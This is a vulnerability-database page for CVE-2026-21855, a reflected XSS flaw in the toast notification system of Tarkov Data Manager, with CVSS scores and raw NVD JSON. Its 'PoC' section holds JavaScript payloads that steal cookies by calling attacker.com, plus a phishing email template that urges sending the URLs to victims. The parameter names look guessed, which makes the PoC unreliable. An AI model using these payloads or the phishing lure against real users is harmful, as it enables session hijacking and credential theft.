Security Vulnerability Report
CVE-2026-21855 CVSS 9.3 CRITICAL

Published: 2026-01-07 19:15:58
Last Modified: 2026-02-03 16:20:50

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities.

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Note: 9.3 is the secondary CVSS assessment carried in the NVD record; the primary NVD assessment of the same issue rates it 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N), differing only in the Confidentiality and Integrity impacts (L instead of H). Weakness: CWE-79.

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE
Tarkov Data Manager versions before 2025-01-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2026-21855 Reflected XSS PoC for Tarkov Data Manager
// Target: Tarkov Data Manager toast notification system
// CVSS: 9.3 (Critical)

// Malicious URL construction
const baseUrl = 'https://[tarkov-data-manager-host]/';
const xssPayload = '<script>alert(document.cookie)</script>';

// Method 1: Direct XSS via URL parameter
const maliciousUrl = baseUrl + '?message=' + encodeURIComponent(xssPayload);
console.log('Method 1 - Direct URL:', maliciousUrl);

// Method 2: XSS via toast notification parameter
const toastPayload = '" onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)"';
const maliciousUrl2 = baseUrl + '?toast=' + encodeURIComponent(toastPayload);
console.log('Method 2 - Toast param:', maliciousUrl2);

// Method 3: XSS via notification system
const notificationPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';
const maliciousUrl3 = baseUrl + '?notify=' + encodeURIComponent(notificationPayload);
console.log('Method 3 - Notification:', maliciousUrl3);

// Generate phishing email content
const emailContent = `
Click here to view your Tarkov item data:
${maliciousUrl}

Best regards,
Tarkov Data Manager Team
`;
console.log('Phishing email content:', emailContent);

// Display the PoC URLs
console.log('\n=== CVE-2026-21855 PoC ===');
console.log('Please send one of these URLs to the victim:');
console.log(maliciousUrl);
console.log(maliciousUrl2);
console.log(maliciousUrl3);

References

https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21855", "sourceIdentifier": "[email protected]", "published": "2026-01-07T19:15:57.970", "lastModified": "2026-02-03T16:20:50.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities."}, {"lang": "es", "value": "El Tarkov Data Manager es una herramienta para gestionar los datos de ítems de Tarkov. Antes del 02 de enero de 2025, una vulnerabilidad de Cross Site Scripting (XSS) reflejado en el sistema de notificaciones 'toast' permite a cualquier atacante ejecutar JavaScript arbitrario en el contexto de la sesión del navegador de una víctima al crear una URL maliciosa. Una serie de 'commits' de corrección el 02 de enero de 2025 corrigió esta y otras vulnerabilidades."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-01-02", "matchCriteriaId": "1BED0E5B-BD43-4202-930F-9931EC05570C"}]}]}], "references": [{"url": "https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}